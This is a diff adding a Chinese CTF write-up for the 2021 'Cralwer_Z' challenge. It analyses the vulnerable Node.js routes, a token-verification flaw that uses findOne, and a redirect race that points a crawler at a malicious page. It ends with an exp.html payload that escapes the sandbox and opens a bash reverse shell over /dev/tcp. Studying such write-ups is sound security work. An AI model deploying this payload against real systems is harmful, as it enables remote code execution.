--- a/祥云杯 2021.md
+++ b/祥云杯 2021.md
@@ -152,3 +152,152 @@ for i in range(10000):
             break
 ```
 
+## Cralwer_Z
+
+> *2022/02/14*
+
+### 题目
+
+`Nodejs`的代码审计题，进入系统后，有个登录页面，登录之后，有一个可以输入链接的表单
+
+![祥云杯20212](img/祥云杯2021/祥云杯20212.png)
+
+逻辑并不难，下面是关键代码部分
+
+```javascript
+router.post('/profile', async (req, res, next) => {
+    let { affiliation, age, bucket } = req.body;
+    const user = await User.findByPk(req.session.userId);
+    if (!affiliation || !age || !bucket || typeof (age) !== "string" || typeof (bucket) !== "string" || typeof (affiliation) != "string") {
+        return res.render('user', { user, error: "Parameters error or blank." });
+    }
+    if (!utils.checkBucket(bucket)) {
+        return res.render('user', { user, error: "Invalid bucket url." });
+    }
+    let authToken;
+    try {
+        await User.update({
+            affiliation,
+            age,
+            personalBucket: bucket
+        }, {
+            where: { userId: req.session.userId }
+        });
+        const token = crypto.randomBytes(32).toString('hex');
+        authToken = token;
+        await Token.create({ userId: req.session.userId, token, valid: true });
+        await Token.update({
+            valid: false,
+        }, {
+            where: {
+                userId: req.session.userId,
+                token: { [Op.not]: authToken }
+            }
+        });
+    } catch (err) {
+        next(createError(500));
+    }
+    if (/^https:\/\/[a-f0-9]{32}\.oss-cn-beijing\.ichunqiu\.com\/$/.exec(bucket)) {
+        res.redirect(`/user/verify?token=${authToken}`)
+    } else {
+        // Well, admin won't do that actually XD. 
+        return res.render('user', { user: user, message: "Admin will check if your bucket is qualified later." });
+    }
+});
+
+
+router.get('/verify', async (req, res, next) => {
+    let { token } = req.query;
+    if (!token || typeof (token) !== "string") {
+        return res.send("Parameters error");
+    }
+    let user = await User.findByPk(req.session.userId);
+    const result = await Token.findOne({
+        token,
+        userId: req.session.userId,
+        valid: true
+    });
+    if (result) {
+        try {
+            await Token.update({
+                valid: false
+            }, {
+                where: { userId: req.session.userId }
+            });
+            await User.update({
+                bucket: user.personalBucket
+            }, {
+                where: { userId: req.session.userId }
+            });
+            user = await User.findByPk(req.session.userId);
+            return res.render('user', { user, message: "Successfully update your bucket from personal bucket!" });
+        } catch (err) {
+            next(createError(500));
+        }
+    } else {
+        user = await User.findByPk(req.session.userId);
+        return res.render('user', { user, message: "Failed to update, check your token carefully" })
+    }
+})
+
+
+// Not implemented yet
+router.get('/bucket', async (req, res) => {
+    const user = await User.findByPk(req.session.userId);
+    if (/^https:\/\/[a-f0-9]{32}\.oss-cn-beijing\.ichunqiu\.com\/$/.exec(user.bucket)) {
+        return res.json({ message: "Sorry but our remote oss server is under maintenance" });
+    } else {
+        // Should be a private site for Admin
+        try {
+            const page = new Crawler({
+                userAgent: 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36',
+                referrer: 'https://www.ichunqiu.com/',
+                waitDuration: '3s'
+            });
+            await page.goto(user.bucket);
+            const html = page.htmlContent;
+            const headers = page.headers;
+            const cookies = page.cookies;
+            await page.close();
+
+            return res.json({ html, headers, cookies});
+        } catch (err) {
+            return res.json({ err: 'Error visiting your bucket. ' })
+        }
+    }
+});
+```
+
+`/profile`会接受符合正则表达式的`bucket`值，然后修改它，不过会先将`bucket`缓存到`personalBucket`中，通过一个`302`跳转到`/verify`页面进行验证，不过需要携带一个有效的`token`值。每次在提交`bucket`时，系统都会将其他非本次生成`token`值的`valid`改为`false`，即禁止使用。
+
+这段代码主要包含两个问题：
+
+- `/verify`中，`findOne`函数的错误使用
+
+`/verify`中，校验逻辑使用`findOne`来查找列表中符合要求的数据，但是这个写法是错误的，如下所示
+
+![](img/祥云杯2021/祥云杯20213.png)
+
+这段语句代表从数据库查询出`token`，`userId`，`valid`等属性，由于使用`where`条件，导致`SQL`语句永远为真，校验失败
+
+- `bucket`不是立即更新
+
+结合这两个问题，可以通过截断`302`跳转的方式，让一个能经过检验的`bucket`，先获取`token`（非必要），然后再发送一次请求，使恶意`bucket`更新到`personalBucket`中，再利用之前的`token`，访问`verify`界面，将`bucket`更新为恶意地址。
+
+![](img/祥云杯2021/祥云杯20214.png)
+
+而代码中还应用了`zoobie`库，存在[ RCE ](https://ha.cker.in/index.php/Article/13563)，将`bucket`的网址替换为恶意地址，即可反弹`shell`
+
+![](img/祥云杯2021/祥云杯20215.png)
+
+### payload
+
+```javascript
+// 前面的只需要需要VPS，就不写了
+// exp.html
+<script>
+const process = this.constructor.constructor('return this.process')();
+process.mainModule.require('child_process').exec('bash -c "bash -i >& /dev/tcp/*/4444 0>&1"');
+</script>
+```
+
